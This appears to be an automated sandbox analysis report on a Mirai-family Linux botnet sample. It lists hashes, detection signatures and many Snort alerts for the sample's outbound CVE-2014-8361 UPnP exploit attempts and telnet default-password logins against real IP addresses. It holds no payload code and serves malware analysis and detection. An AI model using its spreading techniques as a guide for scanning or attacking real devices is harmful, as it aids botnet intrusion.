Linux Analysis Report swOGb2sZYt

Overview

General Information

Sample Name: swOGb2sZYt
Analysis ID: 512832
MD5: 0d987a045736b3c9164d851d5abf20e7
SHA1: 4c3449d8826b0b8edfaaff4788c762a8c072b759
SHA256: 4704abb6701285007a922928f19ae74cee37103046e762e385a0154c2fd899fd
Tags: 32elfmiraimotorola
Infos:

Detection

Mirai
Score: 76
Range: 0 - 100
Whitelisted: false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Uses known network protocols on non-standard ports
Sample has stripped symbol table
HTTP GET or POST without a user agent
Uses the "uname" system call to query kernel version information (possible evasion)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: swOGb2sZYt Virustotal: Detection: 52% Perma Link
Source: swOGb2sZYt ReversingLabs: Detection: 51%

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47692 -> 45.43.236.61:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47692 -> 45.43.236.61:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59518 -> 45.127.160.100:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59518 -> 45.127.160.100:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 142.234.200.81:23 -> 192.168.2.23:52290
Source: Traffic Snort IDS: 492 INFO TELNET login failed 142.234.200.81:23 -> 192.168.2.23:52290
Source: Traffic Snort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 217.208.162.251: -> 192.168.2.23:
Source: Traffic Snort IDS: 716 INFO TELNET access 142.234.200.81:23 -> 192.168.2.23:52304
Source: Traffic Snort IDS: 492 INFO TELNET login failed 142.234.200.81:23 -> 192.168.2.23:52304
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54512 -> 45.123.196.78:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54512 -> 45.123.196.78:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50926 -> 185.147.58.18:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50926 -> 185.147.58.18:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50932 -> 185.147.58.18:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 142.234.200.81:23 -> 192.168.2.23:52320
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37666 -> 45.126.229.83:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37666 -> 45.126.229.83:52869
Source: Traffic Snort IDS: 492 INFO TELNET login failed 142.234.200.81:23 -> 192.168.2.23:52320
Source: Traffic Snort IDS: 716 INFO TELNET access 142.234.200.81:23 -> 192.168.2.23:52354
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52122 -> 45.45.156.89:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52122 -> 45.45.156.89:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53760 -> 45.125.110.8:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53760 -> 45.125.110.8:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54088 -> 45.42.94.146:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54088 -> 45.42.94.146:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52126 -> 45.45.156.89:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40570 -> 45.127.163.58:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40570 -> 45.127.163.58:52869
Source: Traffic Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:52354 -> 142.234.200.81:23
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42036 -> 185.243.14.167:52869
Source: Traffic Snort IDS: 492 INFO TELNET login failed 142.234.200.81:23 -> 192.168.2.23:52354
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52784 -> 45.84.88.242:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52784 -> 45.84.88.242:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52786 -> 45.84.88.242:52869
Source: Traffic Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:43520 -> 125.139.34.17:23
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57492 -> 91.200.120.137:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45784 -> 91.79.50.28:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45784 -> 91.79.50.28:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45862 -> 91.79.50.28:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 142.234.200.81:23 -> 192.168.2.23:52390
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45708 -> 45.84.88.41:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45708 -> 45.84.88.41:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45714 -> 45.84.88.41:52869
Source: Traffic Snort IDS: 492 INFO TELNET login failed 142.234.200.81:23 -> 192.168.2.23:52390
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40374 -> 45.33.248.110:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40374 -> 45.33.248.110:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52182 -> 45.207.219.147:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52182 -> 45.207.219.147:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46092 -> 45.207.220.22:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46092 -> 45.207.220.22:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60088 -> 45.207.220.173:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60088 -> 45.207.220.173:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59300 -> 185.235.183.89:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59300 -> 185.235.183.89:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59310 -> 185.235.183.89:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 142.234.200.81:23 -> 192.168.2.23:52420
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52194 -> 45.207.219.147:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46104 -> 45.207.220.22:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60100 -> 45.207.220.173:52869
Source: Traffic Snort IDS: 492 INFO TELNET login failed 142.234.200.81:23 -> 192.168.2.23:52420
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 125.139.34.17:23 -> 192.168.2.23:43520
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 125.139.34.17:23 -> 192.168.2.23:43520
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57730 -> 91.77.125.249:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57730 -> 91.77.125.249:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57732 -> 91.77.125.249:52869
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 12.45.41.169:23 -> 192.168.2.23:34776
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 12.45.41.169:23 -> 192.168.2.23:34776
Source: Traffic Snort IDS: 716 INFO TELNET access 142.234.200.81:23 -> 192.168.2.23:52444
Source: Traffic Snort IDS: 492 INFO TELNET login failed 142.234.200.81:23 -> 192.168.2.23:52444
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43672 -> 45.254.24.84:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43672 -> 45.254.24.84:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 142.234.200.81:23 -> 192.168.2.23:52464
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52652 -> 45.122.136.235:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52652 -> 45.122.136.235:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37324 -> 45.127.163.5:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37324 -> 45.127.163.5:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54998 -> 45.125.111.91:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54998 -> 45.125.111.91:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45842 -> 45.120.206.163:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45842 -> 45.120.206.163:52869
Source: Traffic Snort IDS: 492 INFO TELNET login failed 142.234.200.81:23 -> 192.168.2.23:52464
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51942 -> 91.79.5.231:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51942 -> 91.79.5.231:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51944 -> 91.79.5.231:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 142.234.200.81:23 -> 192.168.2.23:52502
Source: Traffic Snort IDS: 492 INFO TELNET login failed 142.234.200.81:23 -> 192.168.2.23:52502
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44882 -> 45.115.243.94:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44882 -> 45.115.243.94:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53216 -> 45.115.239.162:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53216 -> 45.115.239.162:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46196 -> 45.138.70.231:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46196 -> 45.138.70.231:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44888 -> 45.115.243.94:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37802 -> 185.12.254.94:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37802 -> 185.12.254.94:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46204 -> 45.138.70.231:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37806 -> 185.12.254.94:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 142.234.200.81:23 -> 192.168.2.23:52536
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 12.45.41.169:23 -> 192.168.2.23:34864
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 12.45.41.169:23 -> 192.168.2.23:34864
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55986 -> 45.84.88.255:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55986 -> 45.84.88.255:52869
Source: Traffic Snort IDS: 492 INFO TELNET login failed 142.234.200.81:23 -> 192.168.2.23:52536
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51126 -> 185.65.163.212:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51126 -> 185.65.163.212:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51132 -> 185.65.163.212:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35340 -> 185.235.181.157:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35340 -> 185.235.181.157:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35342 -> 185.235.181.157:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54366 -> 185.160.196.76:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54366 -> 185.160.196.76:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54374 -> 185.160.196.76:52869
Source: Traffic Snort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 62.20.220.27: -> 192.168.2.23:
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55994 -> 45.84.88.255:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34636 -> 91.134.128.0:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34636 -> 91.134.128.0:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39174 -> 45.125.110.180:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39174 -> 45.125.110.180:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42590 -> 45.41.85.55:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42590 -> 45.41.85.55:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59940 -> 185.186.48.244:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59940 -> 185.186.48.244:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59972 -> 185.186.48.244:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50896 -> 45.115.230.11:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:50896 -> 45.115.230.11:52869
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 12.45.41.169:23 -> 192.168.2.23:35022
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 12.45.41.169:23 -> 192.168.2.23:35022
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49646 -> 91.77.246.67:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49646 -> 91.77.246.67:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49652 -> 91.77.246.67:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46058 -> 185.113.135.102:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46058 -> 185.113.135.102:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52712 -> 45.207.220.119:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52712 -> 45.207.220.119:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59242 -> 45.33.241.163:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59242 -> 45.33.241.163:52869
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 125.139.34.17:23 -> 192.168.2.23:43788
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 125.139.34.17:23 -> 192.168.2.23:43788
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46094 -> 185.113.135.102:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43858 -> 45.122.137.200:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43858 -> 45.122.137.200:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42080 -> 45.41.94.171:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42080 -> 45.41.94.171:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42098 -> 45.41.94.171:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48710 -> 45.42.86.254:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48710 -> 45.42.86.254:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37178 -> 45.156.25.142:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37178 -> 45.156.25.142:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52388 -> 45.43.229.232:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52388 -> 45.43.229.232:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48904 -> 185.203.230.44:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48904 -> 185.203.230.44:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 211.106.163.145:23 -> 192.168.2.23:32876
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48908 -> 185.203.230.44:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53576 -> 45.248.71.82:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53576 -> 45.248.71.82:52869
Source: Traffic Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:32876 -> 211.106.163.145:23
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48950 -> 185.203.230.44:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48950 -> 185.203.230.44:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48956 -> 185.203.230.44:52869
Source: Traffic Snort IDS: 492 INFO TELNET login failed 211.106.163.145:23 -> 192.168.2.23:32876
Source: Traffic Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:48624 -> 186.72.40.225:23
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35714 -> 45.43.239.164:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35714 -> 45.43.239.164:52869
Source: Traffic Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:35248 -> 12.45.41.169:23
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 186.72.40.225:23 -> 192.168.2.23:48624
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 186.72.40.225:23 -> 192.168.2.23:48624
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 12.45.41.169:23 -> 192.168.2.23:35248
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 12.45.41.169:23 -> 192.168.2.23:35248
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58452 -> 185.245.0.220:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58452 -> 185.245.0.220:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54954 -> 45.121.82.127:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54954 -> 45.121.82.127:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39512 -> 45.42.82.57:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39512 -> 45.42.82.57:52869
